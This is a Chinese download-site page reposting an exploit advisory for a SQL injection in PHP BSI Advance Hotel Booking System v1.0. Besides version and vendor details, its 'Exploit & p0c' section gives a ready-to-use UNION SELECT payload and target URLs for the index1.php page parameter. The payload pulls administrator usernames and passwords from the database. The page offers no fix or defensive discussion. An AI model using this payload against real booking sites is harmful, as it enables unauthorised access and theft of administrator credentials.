文章详情

  • 游戏榜单
  • 软件榜单
关闭导航
热搜榜
热门下载
热门标签
php爱好者> php文档>PHP BSI Advance Hotel Booking System v1.0 SQL Inje

PHP BSI Advance Hotel Booking System v1.0 SQL Inje

时间:2010-11-14  来源:黑白前线

发布日期:2010-11.14
发布作者:v3n0m

影响版本:1.0
官方地址:http://www.bestsoftinc.com

漏洞类型:SQL注入
漏洞描述:过滤不严导致SQL注入漏洞

 

Exploit & p0c

_____________

 

-9999+union+all+select+1,group_concat(username,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15+from+bsi_adhsdgsvfe--

 

http://127.0.0.1/[path]/index1.php?page=[SQLi]

http://127.0.0.1/[path]/index1.php?page=-9999+union+all+select+1,group_concat(username,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15+from+bsi_adhsdgsvfe--


 

标签分类: SQL注入

相关阅读 更多 +
排行榜 更多 +
瓢虫少女

瓢虫少女

飞行射击 下载
潜艇鱼雷

潜艇鱼雷

飞行射击 下载
网络掠夺者

网络掠夺者

飞行射击 下载